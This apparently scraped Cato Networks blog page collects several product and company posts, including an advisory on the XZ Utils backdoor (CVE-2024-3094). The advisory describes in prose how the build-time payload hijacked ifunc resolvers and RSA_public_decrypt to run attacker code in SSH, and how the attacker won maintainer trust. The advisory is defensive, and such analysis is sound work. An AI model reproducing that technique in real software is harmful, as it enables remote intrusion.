Women in Tech: A Conversation with Cato’s Shay Rubio

For International Women’s Day (March 8, 2024), the German language, software news site, entwickler.de, interviewed Cato product manager Shay Rubio about her journey in high... Read ›
Women in Tech: A Conversation with Cato’s Shay Rubio For International Women’s Day (March 8, 2024), the German language, software news site, entwickler.de, interviewed Cato product manager Shay Rubio about her journey in high tech. Here’s an English translation of that interview: When did you become interested in technology and what first got you interested in tech? I’m a curious person by nature and I was always intrigued by understanding how things work. I think my interest in technology was sparked during my military service in an intelligence unit, which revolved around understanding cyber threats and cyber security. How did your career path lead you to your current position? I am a product manager for Cato Networks, working on cybersecurity products like our Cato XDR, which we just announced in January. My interest in the cybersecurity space led me to search for a position in a top company in this field, but I still wanted a place that moves at the pace of a startup. Cato was the perfect blend of both. Do you have persons, that supported you or did you have to overcome obstacles? Do you have a role model? I was attending professional meetups searching for a mentor for some guidance in my career path. I approached a senior product manager and we clicked, and he’s been my mentor ever since, helping to guide me through obstacles. At Cato, we have some women in top tech positions and I take inspiration from them – they show me what’s possible and serve as role models for me and many other women in the industry. What is your current job? (Company, position etc.) How does your typical workday look like? Like I said, I am a product manager at Cato Networks, working on cybersecurity products like Cato XDR. As a PM, every day looks a bit different – and that’s what I love about it. In a typical day, I could be defining new features, collaborating with the engineering and research teams, taking customer calls showing them our new features, and collecting their feedback. Did you Start a Project of your own or develop something? I haven't yet started something of my own – yet. I have been very involved in Cato’s XDR. It almost feels like starting a project of my own. Is there something you are proud of in your professional career? I'm proud of driving collaboration within our team, encouraging everyone to speak their mind, and moving at the right pace. I think promoting diversity and inclusion within our team is key – each of us brings a unique perspective that eventually creates a better product. I have one example that comes to mind. During a brainstorming session, a team member shared her experience as a former customer support representative. Her insight into common user pain points helped us prioritize the right feature that directly addressed customer needs, resulting in higher user satisfaction and retention. [boxlink link="https://www.catonetworks.com/resources/keep-your-it-staff-happy/"] Keep your IT Staff happy: How CIOs Can Turn the Burnout Tide in 6 Steps | Get Your eBook[/boxlink] Is there a tech or IT topic you would like to know more about? The cybersecurity landscape is changing so quickly – so you have to keep learning. I’m always happy to delve deeper into new threat actors techniques, threats and mitigation strategies. How do you relax after a hard day at work? I love to spend some quality time with my partner, relaxing with a good TV show, or going out for drinks in one of the great cocktail bars we have in Tel Aviv. When I need to clear my head, I love weight training while blasting hip-hop music, and I also try to maintain my long-time hobby of singing. Why aren't there more women in tech? What's your take on that? I think it’s important to have women role models in senior positions in tech companies. We are what we see – and if someone like me has managed to make it, it will feel way more achievable for someonelse to get there, too. In addition, in my opinion, we must have full equality in family life and managing the household tasks to get more women to pursue positions in tech. If you could do another job for one week, what would it be? I’ve always loved singing and music – and I try to incorporate it as a hobby in my day-to-day life, but we all know how it is – there’s never enough time for everything.  I’d love to take a week and play around with music more, including learning the production side of music and creating my own tracks. Which kind of stereotypes or clichés about women in tech did you hear of? Which kind of problems arise from these perceptions? Stereotypes about women's technical abilities or leadership skills persist, even after countless talented, hard-working women have disproven them. These stereotypes hinder our progress – and I mean not only women’s progress, but our society‘s progress as a whole, since we’re missing out on amazing talent due to old, limiting beliefs. It's crucial to challenge these perceptions and advocate for change, for the benefit of us all. Did the conditions for women in the IT and tech industry change since you first started working there? While the conditions for women in tech have improved, more work is needed to ensure equal opportunities and representation. More women leaders will help young women feel like they belong in this industry and that options are open for them so they can aim high and achieve their professional aspirations. Do you have any tips for women who want to start in the tech industry? What should girls and women know about working in the tech industry? My advice for women entering the tech industry is to cultivate a growth mindset, embracing challenges (and failures!) as opportunities for learning and growth. Hard work and perseverance are key in overcoming obstacles and achieving success, especially in demanding environments like tech companies and startups. Additionally, seek out mentors to build a strong support network, and never underestimate the power of your unique perspective in driving innovation and progress in the tech industry.

The Cato Socket Gets LTE: The Answer for Instant Sites and Instant Backup

Every year, Bonnaroo, the popular music and arts festival, takes over a 700-acre farm in the southern U.S. for four days. While the festival is... Read ›
The Cato Socket Gets LTE: The Answer for Instant Sites and Instant Backup Every year, Bonnaroo, the popular music and arts festival, takes over a 700-acre farm in the southern U.S. for four days. While the festival is known for its diverse lineup of music, it also offers a unique and immersive festival experience filled with art, comedy, cinema, and more. For the networking nerds among us, though, the festival might be even more attractive as a stress test of sorts. The festival is held in a temporary, rural location. There is no fixed internet connection to support the numerous vendors. And there’s no city WiFi to plug into. Still, that cute little booth selling the event’s hottest T-shirts needs to process customer transactions, manage inventory through the home office, and access cloud-based sales tools—all while ensuring data security and complying with industry regulations. In short, the perfect problem for our newest Cato Socket – the X1600-LTE Socket. The Cato Socket has always worked with external LTE modems, but by integrating LTE into the Socket, there’s one less device to deploy and one less console to master. The LTE connection is fully managed within Cato, providing usage monitoring of the data plan and real time monitoring of the LTE link quality all within the same Cato Management Application as the rest of your infrastructure. The new Cato X1600-LTE Socket includes two antennas and can operate at up to 150 Mbps upstream and 600 Mbps downstream. LTE As the Secondary Access Link Pop-up music and cultural festivals are hardly the only industries that will benefit from relying on the Cato X1600-LTE Socket. LTE is in high demand as a secondary link, particularly for geographically dispersed enterprises and enterprises relying on real-time data and communications. Retail chains, for example, often have locations in areas of weak infrastructure but still require uninterrupted connectivity for critical operations like point-of-sale systems, inventory management, and secure communication. Logistics and transportation companies back in the headquarters need secondary access to ensure real-time communications with their trucks and fleet. Cato SASE Cloud is particularly effective in carrying real-time communications. Our packet loss mitigation techniques, QoS, the zero or near zero packet loss on our backbone all make for a superior real-time experience. So, it’s no surprise that enterprises relying on real-time data and communication would be interested in the Cato X1600-LTE Socket. [boxlink link="https://www.catonetworks.com/resources/socket-short-demo/"] Cato Demo: From Legacy to SASE in under 2 minutes with Cato sockets | Schedule a Demo[/boxlink] Healthcare providers are looking at it for essential real-time data access for patient care, remote consultations, and medical device communication. Financial institutions require consistent connectivity to conduct secure transactions, data transfers, and communication. Cato X1600-LTE Socket provides a backup connection for a safety net during primary network downtime, minimizing financial losses and reputational damage. LTE As the Primary Access Link Like booths at Lollapalooza, many enterprises can use LTE as a primary connection to Cato SASE Cloud where there’s no DIA infrastructure available. Rural businesses and communities in regions with limited or unreliable fixed internet options will find LTE helpful in providing a readily available and potentially faster connection for essential services like education, healthcare, and communication. Construction sites and temporary locations also will benefit where setting up fixed internet infrastructure can be expensive and impractical. Emergency response teams also need LTE during natural disasters or emergencies where primary communication infrastructure might be compromised. First responders can use LTE to coordinate search and rescue operations and citizen communication. The same goes for mobility situations.  Field service companies where technicians require constant internet access for diagnostics, repairs, and remote support can benefit from Cato X1600-LTE Socket. Transportation and logistics companies with delivery drivers, fleet managers, and transportation hubs can leverage Cato X1600-LTE Socket for secure real-time tracking, delivery route optimization, and communication, ensuring efficient operations on the move. LTE Connectivity Serves Cato’s Mission to Connect Remote and Mobile Users The new LTE-enabled connectivity option fits perfectly into the overall Cato Networks strategy of simplifying and enhancing customers’ network security and performance—especially for geographically dispersed organizations or those requiring consistent connectivity on the go. Regardless of where or how customers connect to the Cato SASE Cloud, they get access to a converged cloud platform that merges critical network and security functions into a single, streamlined solution. A "single pane of glass" management approach provides organizations with a comprehensive view of their entire IT infrastructure, eliminating the need to manage disparate tools and vendors. Cato further simplifies operations by consolidating network security, threat prevention, data protection, and AI-powered incident detection into one platform, reducing complexity and cost and saving valuable time and resources. Cato provides detailed LTE-relevant statistics such as Reference Signal Received Power (RSRP), Reference Signal Received Quality (RSRQ), and Reference Signal Strength Indication (RSSI) in the new LTE analytics tab of the Cato Management Application. The LTE Socket is Now Available The Cato X1600-LTE Socket is a mid-range SD-WAN device that enables optimized and secure enterprise WAN, Internet, and cloud connectivity. The Socket has fiber, copper, and LTE connectivity options. It has dual Micro SIM Standby (DSS), allowing for active standby in the event of failure of the cable connection. It supports up to 150 Mbps for upload, and up to 600 Mbps for download. To learn more about the Cato Socket, visit https://www.catonetworks.com/cato-sase-cloud/cato-edge-sd-wan/.

How Cato Uses Large Language Models to Improve Data Loss Prevention

Cato Networks has recently released a new data loss prevention (DLP) capability, enabling customers to detect and block documents being transferred over the network, based... Read ›
How Cato Uses Large Language Models to Improve Data Loss Prevention Cato Networks has recently released a new data loss prevention (DLP) capability, enabling customers to detect and block documents being transferred over the network, based on sensitive categories, such as tax forms, financial transactions, patent filings, medical records, job applications, and more. Many modern DLP solutions rely heavily on pattern-based matching to detect sensitive information. However, they don’t enable full control over sensitive data loss. Take for example a legal document such as an NDA, it may contain certain patterns that a legacy DLP engine could detect, but what likely concerns the company’s DLP policy is the actual contents of the document and possible sensitive information contained in it. Unfortunately, pattern-based methods fall short when trying to detect the document category. Many sensitive documents don’t have specific keywords or patterns that distinguish them from others, and therefore, require full-text analysis. In this case, the best approach is to apply data-driven methods and tools from the domain of natural language processing (NLP), specifically, large language models (LLM). LLMs for Document Similarity LLMs are artificial neural networks, that were trained on massive amounts of text, commonly crawled from the web, to model natural language. In recent years, we’ve seen far-reaching advancements in their application to our modern-day lives and business use cases. These applications include language translation, chatbots (e.g. ChatGPT), text summarization, and more. In the context of document classification, we can use a specialized LLM to analyze large amounts of text and create a compact numeric representation that captures semantic relationships and contextual information, formally known as text embeddings. An example of a LLM suited for text embeddings is Sentence-Bert.  Sentence-BERT uses the well-known transformer-encoder architecture of BERT, and fine-tunes it to detect sentence similarity using a technique called contrastive learning. In contrastive learning, the objective of the model is to learn an embedding for the text such that similar sentences are close together in the embedding space, while dissimilar sentences are far apart. This task can be achieved during the learning phase using triplet loss.In simpler terms, it involves sets of three samples: An "anchor" (A) - a reference item A "positive" (P) - a similar item to the anchor A "negative" (N) - a dissimilar item. The goal is to train a model to minimize the distance between the anchor and positive samples while maximizing the distance between the anchor and negative samples. Contrastive Learning with triplet loss for sentence similarity. To illustrate the usage of Sentence-BERT for creating text embeddings, let’s take an example with 3 IRS tax forms. An empty W-9 form, a filled W-9 form, and an empty 1040 form. Feeding the LLM with the extracted and tokenized text of the documents produces 3 vectors with n numeric values. n being the embedding size, depending on the LLM architecture. While each document contains unique and distinguishable text, their embeddings remain similar. More formally, the cosine similarity measured between each pair of embeddings is close to the maximum value. Creating text embeddings from tax documents using Sentence-BERT. Now that we have a numeric representation of each document and a similarity metric to compare them, we can proceed to classify them. To do that, we will first require a set of several labeled documents per category, that we refer to as the “support set”. Then, for each new document sample, the class with the highest similarity from the support set will be inferred as the class label by our model. There are several methods to measure the class with the highest similarity from a support set. In our case, we will apply a variation of the k-nearest neighbors algorithm that implements the classification based on the neighbors within a fixed radius. In the illustration below, we see a new sample document, in the vector space given by the LLM’s text embedding. There are a total of 4 documents from the support set that are located in its neighborhood, defined by a radius R. Formally, a text embedding y from the support set will be located in the neighborhood of a new sample document’s text embedding x , if R ≥ 1 - similarity(x, y) similarity being the cosine similarity function. Once all the neighbors are found, we can classify the new document based on the majority class. Classifying a new document as a tax form based on the support set documents in its neighborhood. [boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP | Get It Now [/boxlink] Creating Advanced DLP Policies Sensitive data is more than just personal information. ML solutions, specifically NLP and LLMs, can go beyond pattern-based matching, by analyzing large amounts of text to extract context and meaning. To create advanced data protection systems that are adaptable to the challenges of keeping all kinds of information safe, it’s crucial to incorporate this technology as well. Cato’s newly released DLP enhancements which leverage our ML model include detection capabilities for a dozen different sensitive file categories, including financial, legal, HR, immigration, and medical documents. The new datatypes can be used alongside the previous custom regex and keyword-based datatypes, to create advanced and powerful DLP policies, as in the example below. A DLP rule to prevent internal job applicant resumes with contact details from being uploaded to 3rd party AI assistants. While we've explored LLMs for text analysis, the realm of document understanding remains a dynamic area of ongoing research. Recent advancements have seen the integration of large vision models (LVM), which not only aid in analyzing text but also help understand the spatial layout of documents, offering promising avenues for enhancing DLP engines even further. For further reading on DLP and how Cato customers can use the new features: https://www.catonetworks.com/platform/data-loss-prevention-dlp/ https://support.catonetworks.com/hc/en-us/articles/5352915107869-Creating-DLP-Content-Profiles

XZ Backdoor / RCE (CVE-2024-3094) is the Biggest Supply Chain Attack Since Log4j

A severe backdoor has been discovered in XZ Utils versions 5.6.0 and 5.6.1, potentially allowing threat actors to remotely access systems using these versions within... Read ›
XZ Backdoor / RCE (CVE-2024-3094) is the Biggest Supply Chain Attack Since Log4j A severe backdoor has been discovered in XZ Utils versions 5.6.0 and 5.6.1, potentially allowing threat actors to remotely access systems using these versions within SSH implementations. Many major Linux distributions were inadvertently distributing compromised versions. Consult your distribution's security advisory for specific impact information. While the attacker's identity and motivation remain unknown, the sophisticated and well-hidden nature of the code raises concerns about a state-sponsored attacker. Cato does not use a vulnerable version of “XZ / liblzma” and Cato's code and infrastructure are not vulnerable to this backdoor / RCE. Cato recommends that enterprises patch immediately. They should update XZ Utils from their Linux distribution's repositories as soon as possible. In addition, they should review all SSH configurations for potentially impacted systems, implement strict security measures (e.g., strong authentication and access controls) and actively monitor network traffic and system logs for anomalies, especially related to SSH activity on vulnerable systems. This situation is still developing. Monitor sources like your distribution's security advisories and trusted security news outlets for updates and enhanced detection methods. What is XZ? XZ Utils is a collection of free software tools used for highly efficient lossless data compression. It works with the .xz file format, known for its superior compression ratios compared to older formats like .gz or .bz2. The primary tools within XZ Utils (xz, unxz, xzcat, etc.) are used through your system's terminal or command prompt. xz: Main command-line tool for compression and decompression. liblzma: A library with programming interfaces (APIs) for use in development. Many major Linux distributions (Debian, Ubuntu, Fedora, etc.) employ XZ to compress software packages within their repositories. This significantly reduces storage costs and speeds up users' downloads.The main Linux kernel source is distributed as an XZ-compressed tar archive. Mac OS also comes preinstalled with XZ. It’s important to note that XZ is open source. How was the Backdoor Discovered? Andres Freund, a PostgreSQL developer and software engineer at Microsoft, discovered the backdoor on March 29, 2024. He observed some unusual behavior on Debian testing systems. Logins via SSH were consuming abnormally high CPU resources, hence, slower SSH performance, and he also encountered valgrind errors (a memory debugging tool) related to liblzma (a core component of XZ Utils). He posted his discovery on “Openwall”. Openwall is a project aimed at enhancing computer security by providing a collection of open-source software, resources and information to improve system and network security. This is a screen from the discussion that Andres Freund started in Openwall. Delving into the source code, he discovered a very odd and out-of-place M4 macro. This macro appeared to be intentionally designed to introduce malicious code during the build process. The backdoor logic was heavily obfuscated to avoid easy detection. What is Known About the Backdoor So Far? The backdoor was committed on February 23, 2024 by “JiaT75”. Even if you have the “XZ” (liblzma) vulnerable version, it does not mean that you are affected. In the build code itself, multiple conditions trigger the payload. Here are a few examples: This condition checks that the target build is for x86_64 and Linux systems. Otherwise, it terminates. This condition checks that the build process should be done with “gcc”. Otherwise, it terminates. From what we know so far here, are the steps in the malicious build process: Checking various configuration settings and environment variables to ensure the build environment meets certain criteria (e.g., using GCC compiler, GNU linker, x86-64 architecture, etc.). If the build environment is suitable, the script modifies the Makefiles and build configuration to enable the injection of the malicious code. The script checks for specific source files related to CRC (cyclic redundancy check) algorithms used in XZ. The script then attempts to inject a modified version of the CRC code into the XZ utility. It does this by:Extracting and decrypting a payload file (good-large_compressed.lzma) using a decryption algorithm.Saving the decrypted payload as liblzma_la-crc64-fast.o. Replacing the original CRC code with the modified version, including the decrypted payload. The script compiles the modified CRC code using the GCC compiler with specific flags and options. If the compilation is successful, the script replaces the original CRC object files (.libs/liblzma_la-crc64_fast.o and .libs/liblzma_la-crc32_fast.o) with the modified versions. The script links the modified object files into the XZ library (liblzma.so). After the build and successful installation, the backdoor intercepts execution by substituting ifunc resolvers for crc32_resolve() and crc64_resolve() , changing the code to call _get_cpuid() “ifunc” is a glibc mechanism that allows you to implement a function in different ways and choose between implementations while the program is running. Afterwards, the backdoor monitors the dynamic connection of libraries to the process through an immediately installed audit hook, waiting for the connection of the RSA_public_decrypt@got.plt library. Having seen the RSA_public_decrypt@got.plt connection, the backdoor replaces the library address with the address of the controlled code. Now, when connecting via SSH, in the context before key authentication, the process will execute code controlled by the attacker. As you can see, it’s a sophisticated and stealthy attack that can only be carried out by a nation-state-sponsored adversary. The “xz” Github and the official site were taken down. [boxlink link="https://catonetworks.easywebinar.live/registration-88"] Supply chain attacks & Critical infrastructure: CISA’s approach to resiliency | Watch Master Class[/boxlink] Who is Behind the XZ Backdoor? The backdoor commit was made by an individual using the name "Jia Tan" and the username "JiaT75". This GitHub account was created in 2021 and has been active since then. They “contributed” to a few projects, including “OSS-Fuzz” by Google. But they were mainly active in the “xz” project. How was “JiaT75”’s commit to “xz” approved? You can read the full chain of events on Evan Boehs’s blog. In short, the path to implementing the backdoor began approximately two years ago. The project’s main developer, Lasse Collin,was accused of slow progress. User Jigar Kumar insisted that xz needed a new maintainer for development. They demanded that patches be merged by Jia Tan, who contributed to the project voluntarily. In 2022, Lasse Collin admitted to a stranger that he was in a difficult position: mental health issues, lack of resources and physical limitations were hindering his progress and the project's pace. However, with Jia Tan's contributions, he said he might be able to take on a more significant role in the project. In 2023, Jia Tan replaced Lasse Collin as the main contact for oss-fuzz, a fuzzer for open-source projects from Google. In 2024, he commits the infrastructure that will be used in the exploit. The commit is attributed to Hans Jansen, a user who seems to have been created solely for this purpose. Jia Tan submits a pull request to oss-fuzz urging the disabling of some checks, citing the need for ifunc support in xz. In 2024, Jia Tan changed the project link in oss-fuzz from tukaani.org/xz to xz.tukaani.org/xz-utils and completed the backdoor's finishing touches. Jia Tan, whoever he may be, started building this attack in 2021, gaining the trust of the primary maintainer of the XZ project. The amount of time and dedication from Jia Tan can only be attributed to a persistent adversary. What Does This Mean for Other Open-source Projects? Creating a validation process for entities that commit the code is important, especially for repositories that can affect other software. As demonstrated by @hasherezade, it is very easy to spoof the account that commits to Github. Conduct a proper code review until you understand what is being committed. In the “XZ” backdoor commit, that backdoor is in the “XZ” file. You could spot the malicious code only if you had run and analyzed it. Maintaining open-source projects requires a lot of time and dedication. You need to vet the person you want to hand the project over to. What Can Cato’s Customers Do? Check Which Version of “XZ” is Installed On Your Systems Check the version of “XZ” on your system. Versions 5.6.0 or 5.6.1 are affected. Run the following command in your terminal: xz –version apt info xz-utils You can also check https://repology.org/project/xz/versions for affected systems. Downgrade to an older version if possible. XZ malicious package detection We've verified that there have been no indications of downloading the known malicious files based on hashes or file names for the past six weeks —this is at least for customers who have TLSi enabled. (Note, however, that it is possible that malicious files could reach users in other forms of distribution, i.e., part of a package.) The BitDefender Anti-Malware engine classifies the XZ package files as malicious files and blocks them if Anti-Malware is enabled. SSH Traffic Until the verification and downgrade process are completed, apply strict access policies on Inbound SSH traffic - limiting access to trusted sources and only in case of actual necessity. Cato’s Multi-layer Detection and Mitigation Approach Cyber-attacks are usually not an isolated event. They have multiple steps. Cato has multiple detections and mitigations across the entire kill chain, including initial access, lateral movement, data exfiltration, and more. Cato’s Infrastructure After checking Cato’s infrastructure, we can confirm that Cato is not using the vulnerable version of XZ / liblzma. Final Thoughts We still do not know the full extent of this backdoor's impact. There is always fallout in such cases as the security community delves deep and uncovers more information about possible attacks. The initial commit was on February 23, 2024 and it was discovered on March 29, 2024. This is a significant window for malicious activity to occur. In security incidents, multiple layers of detection and mitigation capabilities are crucial to halt the attack through various means. We are continuing to research and monitor for further developments.

Outsmarting Cyber Threats: Etay Maor Unveils the Hacker’s Playbook in the Cloud Era

This blog post is based on research by Avishay Zawoznik, Security Research Manager at Cato Networks. The Cloud Conundrum: Navigating New Cyber Threats in a... Read ›
Outsmarting Cyber Threats: Etay Maor Unveils the Hacker’s Playbook in the Cloud Era This blog post is based on research by Avishay Zawoznik, Security Research Manager at Cato Networks. The Cloud Conundrum: Navigating New Cyber Threats in a Digital World In an era where cyber threats evolve as rapidly as the technology they target, understanding the mindset of those behind the attacks is crucial. This was the central theme of a speech given by Etay Maor, Senior Director of Security Strategy, of Cato Networks at the MSP EXPO 2024 Conference & Exposition in Fort Lauderdale, Florida. Titled, “SASE vs. On-Prem A Hacker’s Perspective,” Maor’s session provided invaluable insights into the sophisticated tactics of modern cybercriminals. Maor’s presentation painted a vivid picture of the ongoing battle in cyber work. He emphasized that as businesses transition to cloud-based solutions, hackers are not far behind, exploiting these very platforms to orchestrate their malicious activities. Trusted cloud services and applications, once seen as safe havens, are now being used to extract sensitive data, distribute malware, and launch phishing campaigns. The session highlighted a concerning trend: many organizations are still anchored in an on-premises mindset. This approach, unfortunately, is increasingly inadequate in countering modern cyber threats. Maor’s argument was supported by a series of case studies detailing real-life attacks, showcasing how these threats are not just theoretical but present and active dangers. [boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/"] Discover the Cybersecurity Master Class[/boxlink] Embracing SASE: A New Frontier in Cybersecurity One of the most interesting parts of the session was the live demonstrations. These demonstrations brought to light the ease with which hackers can penetrate systems that rely on outdated security models. Maor also shared insights from underground forums, offering a rare glimpse into the ways hackers plan and execute their attacks. This peek into the hacker’s world underscored the need for a more dynamic and forward-thinking approach to cybersecurity. In contrast to the traditional on-premises solutions, Maor extolled the virtues of SASE architecture. He delineated how SASE’s convergence of network and security services into a single, cloud-native solution offers a more robust defense against the complexities of today’s cyber landscape. SASE’s adaptability, scalability, and integrated security posture make it a formidable opponent against the tactics employed by modern hackers. The key takeaway from Maor’s speech was clear: the transition to cloud-based infrastructures demands a paradigm shift in our approach to cybersecurity. Traditional methods are no longer sufficient in this new digital battlefield. Businesses must embrace innovative solutions like SASE to stay ahead of cybercriminals. As we navigate this complex cybersecurity landscape, Maor’s insights are not just thought-provoking but essential. To delve deeper into these concepts and fortify your organization’s cybersecurity posture, don’t miss Cato Networks’ Cybersecurity Master Class. This comprehensive resource offers a wealth of knowledge and strategies to combat the ever-evolving threat landscape. Visit Cybersecurity Master Class webpage today and take the first step towards a more secure digital future.

Winning the 10G Race with Cato

The Need for Speed The rapidly evolving technology and digital transformation landscape has ushered in increased requirements for high-speed connectivity to accommodate high-bandwidth application and... Read ›
Winning the 10G Race with Cato The Need for Speed The rapidly evolving technology and digital transformation landscape has ushered in increased requirements for high-speed connectivity to accommodate high-bandwidth application and service demands.  Numerous use cases, such as streaming media, internet gaming, complex data analytics, and real-time collaboration, require we go beyond today’s connectivity trends to define new ones.  Our ever-changing business landscape dictates that every transaction, every bit, and every byte will matter more tomorrow than it does today, so these use cases require a flexible and scalable network infrastructure to keep pace with innovation. 10G Enabling Industries Bandwidth-hungry use cases continue to evolve, and the demand to accommodate them will continue to grow.  To accommodate these use cases, today’s organizations must aggregate multiple 1G links, which introduces its own set of issues, including configuration, reliability, scalability, and maintenance.  However, achieving these high-performance business requirements is now possible with 10 gigabits per second (10G) bandwidth, which is poised to become a key enabler of digital business. 10G has rapidly evolved into a necessity for modern digital companies, institutions, and governments, and all stand to benefit from this increased capacity.  So, whether it is telemedicine, enterprise networking, or cloud computing, the requirement for 10G bandwidth will be driven by the requirement for predictable and reliable user experiences. This will revolutionize modern-day use cases across numerous industries and bring about new business opportunities for customers and service providers alike.  Another motivator for the move to 10G is the insatiable demand for scalable global connectivity.  This demand dictates optimized networking and capacity that scales with the business as non-negotiable requirements for the future of digital business. 10G can deliver on these demands to accelerate networking capabilities, allowing it to exceed previous constraints to improve performance.  However, despite the numerous enhancements 10G brings to modern bandwidth-hungry industries, an innovative platform that scales performance and ensures reliability is required to realize its full potential. Achieving these benefits requires a unique architectural approach to scaling network capabilities while securely accelerating business innovation.  This approach extracts core networking and security functions from the on-prem hardware edge. It then converges them into a single software stack on a global cloud-native service, making it easier to expand existing capacity to 10G without expensive hardware upgrades. This requires a SASE service that delivers the enhanced performance needed for digital industries and achieves maximum efficiency and effectiveness. This is only possible with a powerful platform like Cato. [boxlink link="https://www.catonetworks.com/customers/from-garage-to-grid-how-cato-networks-connects-and-secures-the-tag-heuer-porsche-formula-e-team/"] From Garage to Grid: How Cato Networks Connects and Secures the TAG Heuer Porsche Formula E Team | Read Customer Story[/boxlink] More Efficient 10G with Cato SASE Cloud Platform The Cato SASE Cloud platform is a global service built on top of a private cloud network of interconnected Points of Presence (PoPs) running the identical software stack. This is significant because the single-pass cloud engine (SPACE) powers the platform. Cato SPACE is a converged cloud-native engine that enables simultaneous network and security inspection of all traffic flows. It applies consistent global policies to these flows at speeds up to 10G per tunnel from a single site without expensive hardware upgrades.   This is only possible because of the power of Cato SPACE and improvements made to our core to enable faster performance at the cloud edge. Cato provides customers and partners with multi-layered resiliency built into an SLA-backed backbone that drives improved 10G performance, security, and reliability without compromise.  Industries like manufacturing, media, healthcare, and performance sports present unique opportunities for predictable, reliable, high-performance experiences that only a robust platform can deliver.  The Cato SASE Cloud and 10G dramatically alter the performance conversation for transformational industries and bring a new digital platform approach to modernizing their networks.  Cato SASE Cloud Platform and the TAG Heuer Porsche Formula E Team Cato has introduced 10G at the 2024 Tokyo E-Prix, the perfect venue to highlight Cato's breakthrough performance. In the fast-paced world of Formula E, every second counts. The sport is intensively data-driven, where teams rely on their IT networks to analyze data and make critical, split-second strategy decisions to achieve a winning edge. Multiple computers in the car produce 100 to 500 billion data points per event, with more than 400 gigabytes of data generated and sent back to the cloud for analysis. With 16 E-Prix this season, many in regions lacking Tokyo's developed infrastructure, the ABB FIA Formula E Word Championship presents an incredible networking and security stress test. Cato SASE Cloud provides fast, secure, and reliable access to the TAG Heuer Porsche Formula E Team, regardless of location. To learn more about Cato SASE Cloud, visit us at https://www.catonetworks.com/platform/  To learn more about Cato's partnership with the TAG Heuer Porsche Formula E Team, visit us at https://www.catonetworks.com/porsche-formula-e-team/.  

When SASE-based XDR Expands into Network Operations: Revolutionizing Network Monitoring

Cato XDR breaks the mold: Now, one platform tackles both security threats and network issues for true SASE convergence. SASE, or Secure Access Service Edge,... Read ›
When SASE-based XDR Expands into Network Operations: Revolutionizing Network Monitoring Cato XDR breaks the mold: Now, one platform tackles both security threats and network issues for true SASE convergence. SASE, or Secure Access Service Edge, represents the core evolution of today’s enterprise networks converging network and security functions into a single, unified, cloud-native architecture. Today's global work-from-anywhere model amplifies this need for IT to have centralized management of both network connectivity and comprehensive security. While simply said, comprehensive security entails the complexity of an amalgam of many different security tools. Complementing the SASE revolution is XDR (Extended Detection and Response), a powerful tool that analyzes data from various security solutions to provide a unified view of potential threats across the enterprise. SASE and XDR are powerful tools on their own, but even greater security benefits can be achieved by enabling them to work together more seamlessly. How do we make this happen?  Unlocking Security Potential: SASE + XDR Tighter alignment between SASE and XDR unlocks the full potential of both, for a more robust security posture. While XDR tools excel in analyzing data from various security solutions, they could do much more with the right quality of data. This is where Cato recently announced our SASE-based XDR, which includes the industry’s broadest range of native security sensors. Traditionally, the XDR tool needs to “normalize” the diverse set of security data it ingests before it can be analyzed, and threat levels can be established. This “normalization” dilutes the quality of the data and adds a layer of complexity. When data is diluted or of low quality, it becomes more challenging to distinguish legitimate threats from false positives. By eliminating the necessity normalize data from disparate security solutions, and instead utilizing a broad range of pure, native data before determining threat levels, Cato’s XDR delivers a higher level of security with faster response times, all within the single management application of the Cato SASE Cloud Platform. What SASE Needs From XDR Cato XDR represents a significant advancement in security incidents detection and response, emphasizing quality and efficiency. However, SASE is a combination of network and security. The intent of SASE is to empower the cohesiveness of network and security in order for enterprises to truly move at the speed of business. This means that a logical expectation for the XDR capabilities of a SASE platform is to also help IT detect issues on the network unrelated to security. Integrating robust network health monitoring capabilities into the central SASE architecture is vital. And guess what? This is precisely the direction we're headed! [boxlink link="https://www.catonetworks.com/resources/the-industrys-first-sase-based-xdr-has-arrived/"] The Industry’s First SASE-based XDR Has Arrived | Download Whitepaper[/boxlink] Cato XDR: Security Stories Plus Network Stories Introducing Network Stories for XDR, by Cato Networks. Network stories for XDR focuses on detection and remediation of connectivity and performance issues. It uses the exact same XDR practices previously developed to detect cyber threats and attacks. Together, it offers a singular SASE-based XDR solution for SOC and NOC teams to collaborate on. With Cato XDR, network stories and security stories seamlessly integrate within the same overarching SASE platform. For IT teams, this consolidation means managing the entire network and security infrastructure from a single, unified platform. From configuration and policy management, to ongoing monitoring, and now - also to detection and remediation, network and security teams can collaborate efficiently using a single pane of glass. This unified, converged approach helps resolve both security and network issues faster, more cohesively, and more efficiently than ever before. Amazingly, in true platform architecture agility, Cato XDR is delivered with a flick of a switch, not by buying-deploying-integrating an entirely new product that adds complexity to the network and security stack. Cato XDR unlocks the power of true SASE convergence, enabling security and network teams to collaborate seamlessly on a single platform. The Role of AI in Network Stories for XDR Cato XDR takes network incident detection to the next level with AI-powered Network Stories. These AI algorithms, in true SASE fashion, go beyond security, collecting network signals to pinpoint root causes to issues like blackouts, brownouts, BGP session disconnects, LAN host downs, and general HA (high-availability) impacts. Similar to security stories, AI/ML is utilized for incident prioritization based on calculated criticality, empowering IT teams to focus on incidents that have the biggest impact on business performance. This technology is true “battle-tested” and proven effective through servicing Cato’s own NOC. Remediation time is further reduced with playbooks that contain guided steps for fast resolution. Pushing SASE Limits for NOC/SOC Convergence Cato provides the world’s leading single-vendor SASE platform as a secure foundation specifically built for the digital business. The Cato SASE Cloud Platform converges networking with a wide range of security capabilities into a global cloud-native service with a future-proof platform that is self-maintaining, self-evolving and self-healing. Cato XDR takes SASE convergence a step further with Network Stories. It leverages Cato's proven AI and machine learning expertise, traditionally used for security analysis, and applies it to network health. Network Stories for XDR identify and remediate network issues such as blackouts and high-availability, empowering IT teams to focus on incidents that most significantly impact business performance. This unified approach streamlines collaboration between security and network teams, enhancing efficiency and enabling faster resolution of issues. With Cato XDR, enterprises can realize the full potential of SASE convergence, achieving robust security and network performance on a single, future-proof platform.

Evasive Phishing Kits Exposed: Cato Networks’ In-Depth Analysis and Real-Time Defense

Phishing remains an ever persistent and grave threat to organizations, serving as the primary conduit for infiltrating network infrastructures and pilfering valuable credentials. According to... Read ›
